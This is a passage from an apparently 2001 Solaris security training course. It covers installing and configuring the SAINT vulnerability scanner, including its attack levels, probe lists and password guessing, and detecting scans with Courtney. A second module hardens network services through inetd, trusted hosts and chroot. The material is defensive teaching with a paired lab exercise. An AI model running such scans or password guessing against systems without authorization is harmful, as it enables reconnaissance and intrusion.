SATAN is a earlier generation tool. Like SAINT, SATAN can examinenetwork services such as finger , Network File Service (NFS), NetworkInformation Service (NIS+), ftp, tftp, and rexecd .

SATAN was written by Dan Farmer and Wietse Venema. It gained areputation as a “hacking” tool, partly because of the offensive name. Later,SATAN became “respectable.” To mitigate some of the uproar surroundingits name, a “repent script” was created that would rename the tool toSANTA (Security Analysis Network Tool for Administrators), whileretaining the functionality.

SAINT is more advanced and has much better reporting than SATAN.

Installing and Using SAINT



SAINT requires you to install the tcpdump utility on the system usingSAINT. The tcpdump utility can be downloaded from the Sun Freewaresite at http://www.sunfreeware.com .

You can obtain SAINT by downloading the source or binaries at World–Wide Digital Security Inc.:http://www.wwdsi.com/saint/ .

Follow these steps to install SAINT:

1. Download the latest version of SAINT (normally a zipped TARarchive).

2. Unzip the file and extract the archive (the archive contains asubdirectory named after the version of SAINT).



3. Read the instructions in the README file in the SAINT subdirectory.With version 3.2 of SAINT, you must run the following commandsfrom the SAINT directory:

# ./configure# make# make install

This builds the SAINT executable in the current directory.

Note – SAINT supports two different procedures for configuring andcompiling the software. The newer procedure uses the configure script.The older method uses the makefile utility. However, the makefileutility is less convenient and is not presented here.



Understanding How SAINT Works

SAINT runs standard components which probe a system to see if it isvulnerable to certain types of attack. A configuration file can preconfigureSAINT. You can change the options at run-time using the Web interface,as presented in “Installing and Using SAINT” on page 12-8, but theapplication settings are managed by a Perl configuration file.



SAINT defines what it detects as attacks. However, these should moreproperly be called analyses because they do not actually attack anything.You can configure the way in which the analysis is made, the scope (howwide an analysis is made), and the attack level.

Warning – Certain SAINT options are dangerous and can cause majornetwork problems. Do not change any configurations unless you are sureof what you are changing.



Using the SAINT Graphical User Interface

SAINT has an easy-to-use graphical user interface (GUI). The SAINTengine reads the configuration file (described in “Configuring SAINT” onpage 12-21) to provide default values, but these can be changed at run-time through the SAINT Control Panel. The SAINT Control Panel leadsyou through a sequence of steps to ensure that SAINT has the requiredinformation before it begins probing. Default information is based on thesaint.cf file.



On startup, SAINT presents a menu form in your default browser asshown in Figure 12-1.

Figure 12-1 SAINT Startup Screen

Use the images on the left side of the form to configure various aspects ofSAINT. The options are:

SAINT home Selects the startup screen

DataManagement

Selects the SAINT database for storing data

Target Selection Selects the hosts which will be analyzed

Data Analysis Displays the results of running the SAINTanalysis

ConfigurationManagement

Selects the attack level and other parameters

Documentation Provides HTML documentation forconfiguring and using SAINT



Defining SAINT Data Management

SAINT obtains considerable amounts of data from the network it isprobing. The SAINT database stores this data so that it can be analyzed.You can define which file is used as shown in Figure 12-2.

Figure 12-2 Defining Where the Data Obtained by SAINT IsStored

Troubleshooting

Provides help with common SAINT problems



Setting SAINT Target Selection

Host names can be entered directly or, in the case of multiple hosts, froma prewritten configuration file, as shown in Figure 12-3.

Figure 12-3 Entering the Names of Hosts to Probe



Defining the Level of Attack

The level of attack governs how many and what type of probes are usedagainst a host. “Configuring SAINT” on page 12-21 describes detailedinformation on attack levels. You can set the attack level in the GUI asshown in Figure 12-4.

Microsoft Windows NT machines have certain special scans associatedwith them because Microsoft Windows NT makes shared ports availableas part of its networking strategy. This strategy makes such machinesespecially vulnerable to attack.

Figure 12-4 Setting the Scanning Level



Allowing for Firewalls

SAINT must know if there is a firewall, because firewalls block certainpackets. If SAINT does not know about the firewall then any machineshidden behind the firewall are invisible. You can indicate whether the hostyou are scanning is behind a firewall, as shown in Figure 12-5.

Figure 12-5 Allowing for Firewalls

When you have reached the screen shown in Figure 12-5, you can begin ascan.



Running a SAINT Scan

To run a scan, click Start the Scan on the Target Selection screen. SeeFigure 12-5 on page 12-17 for a detailed view. This button initiates thescan, which takes less than a minute for a light scan of a single host. Aheavy scan of a host takes several minutes, and more intensive scansinvolving several hosts take much longer.

The first time SAINT runs, a warning screen appears as shown inFigure 12-6 on page 12-18.

Figure 12-6 SAINT Warning Message

Click on the browser Reload Page icon to start the vulnerability scan.



A status screen tracks the scan as it progresses. When the scan iscomplete, the screen displays options for viewing the results of the scan asshown in Figure 12-7.

Figure 12-7 SAINT Scan Complete



The SAINT data results page summarizes the results of the scan as shownin Figure 12-8.

Figure 12-8 SAINT Data Analysis Results

Configuring SAINT


Configuring SAINT

The central configuration of SAINT is based on the saint.cf file. The fileis a Perl module which is loaded and interpreted when the SAINT systeminitializes. The file is divided into a number of sections, each controllingan aspect of the attacks to make.

The following rules help you to understand the file:

1. Lines starting with # are comments and are ignored.

2. Important lines have comments by them. Always read the comment.Remember versions of software and meanings can change.

3. A value of 0 (zero) or null ("" ) usually means FALSE.

4. A value of 1 usually means TRUE.

The rest of this section discusses some of the more important features ofthe configuration file.

Configuring SAINT


Setting the Attack Level

The attack level defines the extent to which SAINT attempts to infiltrate thetarget system (in other words, the exact level of the analysis to be carriedout). The default is set to light (attack level 1). Light attacks are simple,quick, and largely non-intrusive. Because they are non-intrusive, they canbe difficult to detect. They also provide less information than otherattacks. Heavy attacks (level 2) are slow but gather more information. Theyare also fairly easy to detect after the attack has been made. Mostintruders using SAINT start a probe using a light attack then move to ahigher level if they believe that the initial attack was undetected.

Any attack level greater than 2 can be dangerous. Attack levels greaterthan 2 can be so detailed, with such long time-outs, that the targetedsystem can crash.

Configuring SAINT


Level 4 is a special attack level. This is not heavier than level 3, butinstead it deliberately analyzes a system to detect vulnerabilities on theSystem Administration, Networking, and Security (SANS) list of the 10most critical internet security threats (seehttp://www.sans.org/topten.htm ). Level 4 is potentially the mostuseful analysis because it can be run repeatedly against a system to detectif changes have been made that render the system open to a casual attack.

The attack level is determined by the setting of the $attack_levelvariable, as follows:

# Default attack level (0=light, 1=normal, 2=heavy, # 3=heavy+, 4=top10, 5=custom) $attack_level = 0;

Configuring Probes by Attack Level

Each attack uses certain probes. Probes are the modules which run eachattack. While the $attack_level variable determines which probes arerun against a target to build the attack, you can change the probes whichare run within that level. This means that the attacks are not fixed but canbe reconfigured. However, you cannot configure all probes to run. If aprobe has a question mark (?) appended to its name, it runs conditionally.This means that if the service for which the probe is designed is notrunning, then the probe does not run (for example, if the target machine isnot running the NFS service, then the NFS probe does not run).

The probes are listed in the Probes by attack level section of theconfiguration file, as shown in Code 12-1.

Code 12-1 Probes by Attack Level

13 # Probes by attack level.14 #15 # ? Means conditional, controlled by rules.todo.16 # * Matches anything.17 @light = (18 'dns.saint',19 'ostype.saint',20 'rpc.saint',21 'showmount.saint?',22 );2324 @normal = (25 @light,

Configuring SAINT


26 'finger.saint',27 'tcpscan.saint 70,80,ftp,telnet,smtp,nntp,uucp,6000',28 'udpscan.saint 53,177',29 'rusers.saint?',30 'boot.saint?',31 'yp-chk.saint?',32 );3334 @heavy= (35 @light,36 'finger.saint',37 'rusers.saint?',38 'boot.saint?',39 'yp-chk.saint?',40 $heavy_tcp_scan = 'tcpscan.saint 16660,27665, 65000,1-1525,1527-9999',41 $heavy_udp_scan = 'udpscan.saint 27444,31335, 1-1760,1763-2050,32767-33500',42 '*?',43 );

In the @heavy scan section beginning on Line 34 there is an entry (onLine 42) marked *? . That entry means that all probes not explicitly loadedby the script are conditionally loaded.

Configuring SAINT


Setting the Level of Password Guessing

SAINT can test the suitability of various passwords on the system. That is,it can detect the following unsuitable entries:

● A null password

● A password which is the same as a login name

● The word “password”

● The login name spelled backwards

● The login name followed by the digit “1”

The password guessing section of the configuration file is shown inCode 12-2 on page 12-26.

Configuring SAINT


Code 12-2 Password Guessing

1 # Number of passwords to guess for each account2 # identified by rusers or finger. Greater than 23 # will lock out accounts on some systems.4 # 0 disables password guessing.5 $password_guesses = 2;

Caution – Some systems lock out accounts if the number of passwordguesses exceeds a preset number (usually 3). If this is the case with yoursystem, set $password_guesses lower than the lock out value or SAINTcauses user lockouts.

Configuring SAINT


Setting Time-Outs

You might need to specify a time-out for certain probes. Time-outsprevent probes from unnecessarily locking up system resources orcrashing the system when the probe fails to obtain a response from thetarget system. Time-outs are managed by a section in the configurationfile. To specify time-outs:

1. Specify the general (implicit) time-out to be used this way:

# which timeout to use (0=short, 1=med, 2=long)$timeout = 1;

2. Specify an explicit time-out by using lines designated to specificservices:

$nfs_chk_timeout = $long_timeout;$snmp_timeout = 120;

Configuring SAINT


Determining Values for Proximity Variables

Proximity variables refer to how close the current target is from the originalSAINT probe target.

Note – Proximity variables are the most important configuration variablesin the SAINT system. Setting a state to more than 3 can cause multipleproblems in terms of limiting the extent of the attack, network trafficgenerated, and log information generated.

Configuring SAINT


When you determine the required proximity level, use the value of 0 toindicate the initial target host. Machines adjacent to the target host have avalue of 1. Machines adjacent to those hosts have a value of 2, and so on.Therefore, if the attack level is set to 1, then the target host and any hostsadjacent to the target host are probed. The number of hosts that SAINTscans can grow exponentially if you increase $max_proximity_levelwithout carefully thinking about the attack plan. Code 12-3 shows theproximity variable section of the configuration file.

Code 12-3 Setting the Proximity Variable

1 # Proximity variables; how far out do we attack,2 # does severity go down, etc.3 #4 # how far out from the original target do we attack?5 $max_proximity_level = 0;

Configuring SAINT


You should reduce the strength of the attack as the attack propagatesfarther from the initial target system. This practice reduces the chance ofbringing an entire network to a standstill by inadvertent probing. Toreduce the strength of the attack, change the proximity descent variable inthis section of the configuration file as shown in Code 12-4.

Code 12-4 Reducing the Strength of the Attack

1 # Attack level drops by this much each2 # proximity level change3 $proximity_descent = 1;

Using a setting like that shown in Code 12-4 reduces the attack levelvariable by 1 for each successive layer of hosts beyond the initial targethost. However, this does not apply when the attack level is set to 4 (SANStop 10). When the attack level is set to 4, the level always stays the same.

Note – For more detailed information on configuration file settings, seethe SAINT documentation on the saint.cf file (online athttp://www.wwdsi.com/cgi-bin/doc.pl?document=saint.cf ).

Interpreting SAINT Reports



SAINT can produce many different types of reports which you can viewusing a Web browser. This section shows two examples, but during thepractical exercise you should examine as many reports as you can.

Reporting Vulnerabilities by Type

Listing vulnerabilities by type is the most basic report type. In this report,details are summarized and you are given a list of all the vulnerabilitiesSAINT detected for the given attack, as shown in Figure 12-9.

Figure 12-9 Report of Vulnerabilities by Type



Reporting Potential Problems

The potential problems report, shown in Figure 12-10, shows the type ofvulnerability for each system detected.

Figure 12-10 Listing Potential Problems

Note – The comment in Figure 12-10 about “Back Orifice backdoor found”is particularly noteworthy. This is a Microsoft Windows NT Trojan horsewhich can seriously impair network security for all hosts. Solaris OEadministrators must be aware of the specific problems associated withMicrosoft Windows NT machines on a hybrid network.

Detecting Network Analyzer Attacks



Many tools can detect SAINT and similar tools. You can obtain a goodreview of these at:http://ciac.llnl.gov/ciac/ToolsUnixNetMon.html . Some of thetools discussed are:

● Gabriel – A tool from Los Altos Technologies which is written in theC programming language for Solaris OE version 1 and 2.

● Netman – A package from Curtin University. Netman is not a probedetector but is a full network monitoring package.

● NOCOL – This is also a tool from Curtin University. It detects andmonitors all network activity (not only SAINT or SATAN).

● Courtney – A tool written by Computer Incident AdvisoryCapability (CIAC) specifically designed to monitor and detectSAINT or SATAN attacks.



Detecting Attacks Using Courtney

The Courtney utility warns administrators of a SAINT or SATAN attack.Courtney receives its input from the tcpdump utility. Courtney counts thenumber of new services a machine originates within a certain time frame.A machine is identified as a potential SAINT host if it connects tonumerous services within a specified time frame. Like SAINT, Courtney isa Perl utility.

To run Courtney, you need Perl 5 and you must run the tcpdump utility.Perl is part of the standard Solaris OE build, but you must download andinstall the tcpdump utility from the site listed in “Additional Resources”on page 12-3.



Obtaining and Installing Courtney

You can obtain the Courtney utility from a number of FTP sites. Thisexample of Courtney, called courtney.tar.gz , was retrieved fromftp://ciac.llnl.gov/pub/ciac/sectools/unix/courtney/ . Toinstall Courtney:

1. Uncompress and unarchive the courtney-1.3.tar.gz file.

2. The Courtney Perl script uses a hard code search path variable.Unfortunately, this variable does not include the /usr/local/sbindirectory where the tcpdump utility resides. The easiest solution is tolink the tcpdump utility to the /usr/local/bin directory byentering:

# ln /usr/local/sbin/tcpdump /usr/local/bin

3. Alternatively, update the Courtney script to set the correct searchpath. Edit the courtney.pl script and search for the line starting$ENV{'PATH'} . Update the associated search path to include thepath to the tcpdump utility (/usr/local/sbin ).

$ENV{'PATH'}='/bin:/usr/bin:/usr/ucb:/usr/bsd:/usr/sbin:/usr/etc:/usr/local/bin:/usr/local/sbin';



Using Courtney

Start Courtney, as shown in Code 12-5, with the output directed tostandard output. It reports any SAINT attacks (or similar attacks).

Code 12-5 Using Courtney

# ./courtney.pl -stcpdump: listening on hme000:18:10: NORMAL_ATTACK from wallace- target grommit00:18:11: HEAVY_ATTACK from wallace - target grommit

By default, attacks are logged using the Syslog utility at the alert prioritylevel. This logging can be disabled by using the -l option.

Use the -h option to the Courtney command for a full list of commandline options.

Exercise: Using SAINT and Courtney



In this exercise, you will complete the following tasks:

● Install SAINT and perform different levels of attack

● Install and use Courtney to detect attacks

Preparation

Ensure that you have installed the GNU C++ compiler and the makeutility.For the purposes of this exercise you will work in pairs to configureSAINT scanning between your workstation and your partner’sworkstation. You will subsequently configure Courtney to detect scanningattacks on your workstation.

Warning – Due to the nature of the TCP/IP stack implementation onSolaris OE, Courtney can only detect scan attacks initiated by anotherworkstation and does not detect scans originating from the currentworkstation.

Ensure you know the host names of your workstation and your partner’sworkstation.

Task – Installing SAINT

The SAINT download site is listed in “Additional Resources” onpage 12-3. A copy of the download file (saint-3.2.tar ) is also in the/usr/local/pkg directory.

SAINT uses the tcpdump utility, which is not supplied with the Solaris 8OE. This package also requires the openssl and libpcap packages. Theseare available from the sites listed in “Additional Resources” on page 12-3,and are included in the /usr/local/pkg directory. These softwarepackages might already have been installed from a previous exercise ofthis course.



To install SAINT:

1. Extract the SAINT archive into the /usr/local directory to create asubdirectory called saint-3.2 .

2. Follow the instructions in the READMEfile in the saint directory toinstall SAINT.

Task – Running a SAINT Attack

To run a SAINT attack:

1. Start up SAINT and then run a light SAINT attack on your partner’sworkstation and analyze the results.

2. Use the SAINT Target Selection page to select your current hostnamescanning level and then click Start the Scan.

3. Run a heavy attack to gain even more information.

Task – Running SAINT From the Command Line

To run SAINT from the command line:

1. Run a medium level attack on your partners workstation but initiateit from the command line. You can use the -h option to obtaincommand line help from SAINT.

2. You can use the -h option to obtain command line help from SAINT:

# ./saint -h

Task – Installing Courtney

The Courtney download site is listed in “Additional Resources” onpage 12-3. A copy of the download file (courtney-1_3.tar ) is also in the/usr/local/pkg directory.

Courtney uses the tcpdump utility, which is not supplied with the Solaris8 OE. This package also requires the openssl and libpcap packages.These are available from the sites listed in “Additional Resources” onpage 12-3 and are included in the /usr/local/pkg directory. They willhave been installed in the first exercise for this module.



To install Courtney:

1. Extract the Courtney archive and read the READMEfile.

2. Include the tcpdump utility in Courtney’s search path by linking it tothe /usr/local/bin directory.

Task – Using Courtney to Detect Attacks

You must coordinate your work with another person in the class. One ofyou will be the attacker and the other the target.

To use Courtney to detect attacks:

1. Initially, the target workstation must run Courtney from a commandwindow displaying the output to the screen.

2. The attacker must now run SAINT attacks to verify that Courtneydetects the attack. Start with a light SAINT attack and increase thelevel until Courtney recognizes the attack.

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

This section provides the solutions for this module’s exercises.

Installing SAINT

1. Extract the archive into the /usr/local directory to create asubdirectory called saint-3.2 .

2. Follow the instructions in the READMEfile in the SAINT directory toinstall SAINT.

# cd /usr/local# cd pkg# pkgadd -d libpcap-0_6_1-sol8-sparc-local# pkgadd -d openssl-0_9_6-sol8-sparc-local# pkgadd -d tcpdump-3_6_1-sol8-sparc-local# cd ..# tar xvf pkg/saint-3.2.tar# cd saint-3.2# more README# ./configure# make# make install

Running a SAINT Attack

1. Start SAINT and then run a light SAINT attack on your partner’sworkstation and analyze the results.

# ./saint

2. Use the SAINT Target Selection page to select your current hostnameand scanning level and then click Start the Scan.

3. Run a heavy attack to gain even more information by returning tothe Target Selection page and selecting a heavy attack.

Exercise Solutions


Running SAINT From the Command Line

1. With the permission of someone else in the class run a medium levelattack on their machine but initiate it from the command line.

# cd /usr/local/saint-3.2# ./saint -i -a 1 wallacewallace:

Critical Problems:Exports /export/home to everyone

Areas of Concern:Information from ruserid could help hacker

Services:FTPXDM (X login)TelnetuucpX WindowsNFS

Installing Courtney

1. Extract the Courtney archive and read the READMEfile.

# cd /usr/local# tar xvf pkg/courtney-1_3.tar# cd courtney-1.3# more README

2. Include the tcpdump utility in Courtney’s search path by linking it tothe /usr/local/bin directory.

# ln /usr/local/sbin/tcpdump /usr/local/bin

Using Courtney to Detect Attacks

1. Initially, the target workstation must run Courtney from a commandwindow displaying the output to the screen.

# ./courtney.pl -s2. The attacker must now run SAINT attacks to verify that Courtney

detects the attack. Start with a light SAINT attack and increase thelevel until Courtney recognizes the attack.


Module 13

Security Network Services

Objectives


● Configure network services such as telnet and FTP

● Configure remote access using rlogin and rsh commands

● Explain the role of the chroot command for enhanced security

● Configure Anonymous FTP

● Describe the role of authentication tools

● Configure and use Pluggable Authentication Module (PAM)

● Disable the use of rhosts files

● Describe the Sun Enterprise Authentication Mechanism (SEAM) andthe Kerberos 5 protocol

Relevance


Relevance

?!

Discussion – The following questions are relevant to understanding therole of network services:

● Can you run your servers without providing network services?

● Can you list the network services you are running on the hosts youadminister?

● Which network services must you have and which are justconvenient?

● Which of the network services require user authentication and whichare open to all users?


Security Network Services 13-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C



● Online manual pages for chroot(1M) , exec(3), hosts.equiv(4) ,inetd(1M) , inetd.conf(4) , in.ftpd(1M) , login(1) , netgroup(4) ,pam(3PAM), pam.conf(4) , pam_unix(5) , rlogin(1) , and rsh(1)



● Kerberos Home Page online[http://web.mit.edu/kerberos/www/]

Restricting Network Services



The standard Solaris OE installation enables, by default, a number ofnetwork services in the /etc/inetd.conf file. Many of these services arethere for historical reasons and are unnecessary. Some services (such asfinger and rusers ) provide information about the host server and userlogin names which intruders can use to infiltrate those systems.

Consider disabling some or all of the standard network facilities asdescribed in Table 13-1 on page 13-5. Edit the /etc/inetd.conf file bycommenting out entries instead of erasing them. This method is helpfulwhen you try to restore a disabled network service.



The following services are enabled by default, as shown in Table 13-1.

Table 13-1 Network Services Enabled by Default

Service Usage

ftp - /usr/sbin/in.ftpd Transfers files to and from a server. The FTPserver has had a number of securityweaknesses over time, including variationsof the buffer overflow attack. FTP also usesunencrypted passwords. Disable this entry ifFTP is not required. This service alsosupports Anonymous FTP.

telnet -/usr/sbin/in.telnetd

Allows remote login access to a server. Thetelnet service uses unencryptedpasswords. Disable if the telnet service isnot required. Using the Secure Shell (SSH)can eliminate the need for a telnet service.

shell - /usr/sbin/in.rshd Supports the rsh command for runningcommands on the host. If the userauthentication mechanism is used, nopasswords are required; otherwiseunencrypted passwords are used. Use SSHin preference to the rsh command.

login - /usr/sbin/in.rlogind Supports the rlogin command for remotelogin to the host. If the user authenticationmechanism is used, no passwords arerequired; otherwise unencrypted passwordsare used. Use SSH in preference to therlogin command.

exec - /usr/sbin/in/rexecd Supports remote execution of commandsusing the socket exec(3) system call. Mightbe used by networking software to supportclient functionality. Uses unencryptedpasswords. Disable it to see what stopsworking or if something important breaks.

comsat - /usr/sbin/in.comsat Supports remote mail notification using thebiff program. Not needed on most systems.The biff mail notification program informsyou when mail arrives in your mailbox.

talk - /usr/sbin/in.talkd Supports the talk service. Not needed onmost systems.



Several other services are required to support Solaris OE remotemanagement. These are described in the inetd.conf file. Enable onlythose services that are being used at your site.

uucp - /usr/sbin/in.uucp Supports UNIX to UNIX Copy (UUCP) filecopy (used by older UNIX mail programs).Not required on modern UNIX systems.

finger -/usr/sbin/in.fingerd

Provides summary information on theoperating system and current users loggedinto the system. The finger service can alsoprovide more detailed information about anamed user regardless of whether they arelogged in. Disable this service because itprovides intruders with information (suchas valid user account names) that can attackthe system.

rusersd -/usr/lib/netsvc/rusers/rpc.userd

Provides information similar to the whocommand about users logged into thesystem. Disable this service because itprovides intruders with information (such asvalid user account names) that can attackthe system.

sprayd -/usr/lib/netsvc/spray/rpc.sprayd

Analyzes RPC network traffic. Disable thisservice because there are better ways tomonitor the network. The sprayd servicecan be the target of a denial of service attack.

walld -/usr/lib/netsvc/rwall/rcp.rwalld

Writes a message to all logged in users.Intended as a site-wide broadcastmechanism. The walld service is not usefulin most sites and can be used as a networkattack target. If an intruder can write aarbitrary message to a user’s terminal, theycan use terminal (or terminal emulator)features to execute programs on behalf of thelogged in user. These attacks are known asanswerback or send message attacks.Disable this service.

Table 13-1 Network Services Enabled by Default (Continued)

Service Usage



FTP Users

FTP has an additional security measure that allows you to deny some useraccounts access to FTP.

The /etc/ftpusers file contains a list of all user names denied access toFTP (the file name is misleading). By default, this file contains the systemaccounts such as root , bin , adm, and so on. Add additional user names tothis file to prevent accounts from using FTP.

Defending Network Services



It is difficult to defend the network services on your host. If you provide aservice over the network you must accept the possibility of a break-in. Youmust trust that the network service itself is secure but in reality manyservices have security weaknesses that can be attacked. Make sure thatyou use the latest versions of all network service software and keep up-to-date with the security alerts and operating system patches for yoursoftware.

Two techniques can help defend your network services against basicattacks:

● Non-standard port numbers

● Dummy services



Non-Standard Port Numbers

Consider putting services on non-standard port numbers. For example,move the telnet service to port 4321 and tell your users to use thecommand:

# telnet host 4321

This method does not make the service any more secure but it can deter acasual intruder from attacking the system because the intruder cannotfind a telnet server on port 23 and has to look for other weaknesses.

This will not put off an experienced intruder who can use port scanningtools to detect the telnet service, regardless of port number.

Dummy Services

Running dummy services can improve your early warning system fornetwork attacks. A dummy service is a server which sits on a well knownport (such as 23 for telnet ) and logs the IP address of any client whichconnects to that port. Although it also catches genuine user mistakes, thistechnique definitely detects intruders trying to attack your system.

A simple logging service like this can be written by a C, C++, Javatechnology, or Perl programmer.

More sophisticated dummy servers require more programmerdevelopment, but it is still relatively easy to write a server which looks andbehaves like a standard service but provides no functionality except to logthe connections.

One example is a telnet server which prompts for a user name andpassword in exactly the same manner as a real telnet server. But thedummy service always denies access to the system even if the user nameand password are correct. Such a server can sidetrack intrudersattempting to break into a system using a mechanism which cannot bebroken. Imagine putting a dummy front door on your house or apartmentwhich is nailed shut: Even if it could be opened, it simply opens to a solidwall.

Berkeley r Commands


Berkeley r Commands

A number of network security concerns involve the Berkeley rcommands, rlogin , rsh , and rcp . The r commands use privileged ports,ranging from 512 to 1023.

All three commands in the Berkeley r command set require that the userhave an account set up on the remote system:

● The rlogin (remote login) command – Allows a login session on aremote system. To log into host wallace use:

# rlogin wallace

● The rsh (remote shell) command – Also called remsh , executes aprogram on a remote system. To run a ps command on host grommituse:

# rsh grommit ps -ef

Berkeley r Commands


● The rcp (remote copy) command – Allows a user to copy filesbetween remote systems. To copy the sulog file from host wallaceto the temporary directory on grommit use:

# rcp wallace:/var/adm/sulog grommit:/tmp/sulog.wallace

Note – On some older UNIX versions the rsh command was known asremsh because the /usr/bin/rsh command was the restricted Bourneshell. More recent UNIX systems have moved the restricted shell to the/usr/lib/rsh command and standardized the /usr/bin/rsh commandas the remote shell; however the /usr/bin/remsh command is linked tothe /usr/bin/rsh command to maintain backward compatibility.

The rsh and rcp commands are further restricted in that the remote hostmust have configured the host running the command as a trusted host(see “Trusted Hosts” on page 13-12).

You can use the rlogin command if you have an account on the remotesystem, even if the remote system is not trusted. The rlogin commandprompts for a password unless the system running the command is atrusted host.

The rlogin and rsh commands use the -l option to specify a login username to use on the remote host. For user bob to run the ps command asthe root user on grommit , Bob would type:

# rsh -l root grommit ps -ef

The rcp command can also specify user names, but because there mightbe different users on each machine, the file name is prefixed with the username much like an email address. For example:

# rcp alice@wallace:/var/adm/sulog bob@grommit:/tmp/sulog.wallace

This command reads the /var/adm/sulog file from wallace as useralice and writes the file to grommit as user bob .

Berkeley r Commands


Trusted Hosts

Trusted hosts are configured using two types of configuration files on thehost which is the target of the remote command (not the system runningthe command):

● A global configuration file used for all users except root

● Individual user configuration files

Running the command from the host wallace requires grommit toconfigure wallace as a trusted host:

# rsh grommit ps -ef

The trusted host configuration files all have the same format, where eachline represents a trusted host or a trusted host and a named user. The userdefaults to the current user if no user name is supplied on the trusted hostline. User names and hosts can be specified using Netgroups as defined inthe /etc/netgroups file (read the online manual pages and SolarisAnswerBook for a description of Netgroups).

Berkeley r Commands


A simple trusted host file is:

wallacegrommit

Both hosts wallace and grommit are trusted.

Note – A host does not trust itself unless its host name is included in thetrusted hosts file.

A more complex trusted host file is:

wallace bobgrommit alice

In this example, only user bob on host wallace and user alice on hostgrommit are trusted.

Note – The host’s official name must be used. Aliases are not recognized,nor are IP addresses.

Berkeley r Commands


In a trusted host configuration file, a line containing a single plus sign (+)means trust all known hosts, but this is extremely insecure and you shouldnever use it. Systems can be barred from access by preceding the hostname with a minus sign (-), but because this only makes sense when usingthe plus sign it also should not be used. If a host is not listed in theconfiguration file that means that it is denied access.

Note – The trusted host files are one-way only. A given host specifieswhich other hosts are trusted. This does not imply that this host is alsotrusted by the ones it trusts. The other hosts have their own list of trustedhosts.

Berkeley r Commands


Determining Trusted Access

When the target server determines if a user wanting to run a remotecommand is trusted or not, the target server checks the password file toensure that the remote user has an entry on this system. If not, thecommand is rejected.

If the user has a valid account, the target system checks the/etc/hosts.equiv file for all users except for the root user. The/etc/hosts.equiv file identifies the trusted hosts for all the non-rootusers on the system.

Note – Some older versions of SunOS™ and the Solaris OE have a default/etc/hosts.equiv file with the single entry “+”. Delete this file because itis extremely insecure.

Berkeley r Commands


If the user is in the passwd file and the host is a trusted host, the user canuse the rlogin or rsh commands without a password.

Note – Do not use user names in the hosts.equiv trusted file. You mightexpect that adding a user name to a line in the /etc/hosts.equiv filewould restrict the use of the r commands to that named user only.However, in practice, specifying a user name usually allows the nameduser to run commands as any user on this server.

If the user and host are not trusted in the /etc/host.equiv file(remember that root does not use hosts.equiv ), then the system checksfor a file called $HOME/.rhosts (where $HOMEis the user’s homedirectory). The $HOME/.rhosts file only defines trusted hosts for the useraccount actually running the command, which is the same as the userrunning the command unless the user name is supplied on the commandline.

Note – When the user attempting a remote command is logged in as theroot user, only the /.rhosts file is checked, not the /etc/hosts.equivfile.

Berkeley r Commands


Trusted Hosts – Good or Bad?

Many administrators frown on the use of the trusted host mechanism andthe r commands. An intruder who breaks–in to a login account with thisfeature activated can access a large number of systems on the network.This type of access can propagate many viruses and worms. The trustedhost mechanism effectively lowers the overall security of the network tothat of the weakest host.

The opposing argument is that by setting up trusted hosts correctly andonly where necessary, you can avoid using the telnet command to accessa host and you can avoid sending unencrypted passwords across apotentially insecure network.

A useful technique with the root user, trusted–hosts file (/.rhosts ) is toinclude entries for all of your administrators, which allows them to runremote commands on this host. On wallace , for example:

# cat /.rhostswallace alicewallace bob

Berkeley r Commands


This entry allows the user alice and the user bob to run commands onthe host wallace (the current system). This might not make sense untilyou consider that this is the root user trusted hosts file. For example, thisentry allows the user bob to run the following command:

$ rsh -l root wallace passwd eve

This command allows the user bob to change the password for the usereve . The advantage of this configuration is that the user bob does not usethe su command or enter the root user password. This configuration ismore secure than having the user bob (who might be using the telnetcommand from a PC to access the server) use the su command and sendunencrypted passwords over the network where they can be sniffed.

However, if the accounts for either user alice or user bob arecompromised, then the root account is also compromised.

There is no right or wrong answer – just personal preferences. If you areusing tools and techniques like SSL, IPS, or SSH, it is usually a good ideato disable the trusted hosts mechanism. See “Disabling Remote AccessUsing PAM” on page 13-38.

Securing Services With The chroot Command



The chroot command changes the root directory for the duration of aprogram’s execution lifetime. The effect is to run the program in asandbox: the only files and directories that the program can access arethose underneath the new root directory. With the chroot command:

● All absolute pathnames are redirected to the changed root directory(both on the command line and with any files opened) while theprogram executes.

● A reference to the parent directory of the changed root directory isredirected to the root directory itself (which prevents the user fromusing the cd .. command to move up and out of the new rootdirectory).

The chroot command is not an easy command to use and requiresconsiderable work and expertise to set up. However, most of the work canbe easily scripted.

Intelligent use of chroot can dramatically tighten the security of a system.



When to Use the chroot Command

Use the chroot command to run network services in a sandbox.Anonymous FTP and Trivial File Transfer Protocol (TFTP) are the usualservices which are run using the chroot command.

A security-conscious administrator uses the chroot command for allpossible services. Candidates are:

● FTP (in additional to Anonymous FTP)

● HTTP servers (Web servers should run in a sandbox)

● The telnet program

The telnet program can be considered for chroot security. If thetelnet program is configured to use the chroot command, remoteadministration of the host must be done from the console (or adirectly attached terminal) or done using a network CommonDesktop Environment (CDE) session which uses X Display ManagerControl Protocol Description (XDMCP) for login.

● Any network service which does not require access to the fulloperating system

If you use the chroot command, some of the known weaknesses innetwork services can be minimized by presenting a very restricted view ofthe system.

How to Use the chroot Command

To use the chroot command, you must configure a complete environmentfor the executing program including:

● Executable command files

● Shared libraries

● Device files



A basic example of the chroot command that extracts a tar file into the/tmp directory is shown in Code 13-1. You can use the chroot commandto extract a tar archive which has stored absolute instead of relative pathnames. Without the chroot command, extracting the tar archive wouldoverwrite the existing files on disk.

Code 13-1 Using the chroot Command

# cp tools.tar /tmp# chroot /tmp /usr/lib/tar xvf /tools.tar

There are a few points to note about Code 13-1:

● The real path name for the tar archive is /tmp/tools.tar .However, the command line must use its relocated name of/tools.tar because all path names are relative to the /tmp directory(the first parameter to the chroot command).

● The /usr/sbin/static/tar command is a statically linkedprogram (it includes all required libraries in the one executablebinary). The usual tar command in /usr/bin is dynamically linkedand must have the required libraries copied to the changed rootdirectory.

● When the tar archive is extracted all files are under the /tmpdirectory (all absolute path names in the archive are relocated to thenew root directory of /tmp ).



Anonymous FTP

A more complex example of using the chroot command is one forrunning Anonymous FTP. The in.ftpd daemon uses the chrootmechanism when a user logs in as the anonymous user. A password mustbe supplied. It is conventional to use your email address as the password,but most servers accept any password.

Anonymous FTP is insecure because anyone can access the service.Anonymous FTP is usually configured so that files can only be downloadedand not uploaded onto the host.



The in.ftpd daemon needs all of its support libraries and configurationfiles to be in the changed root directory to run correctly. These include:

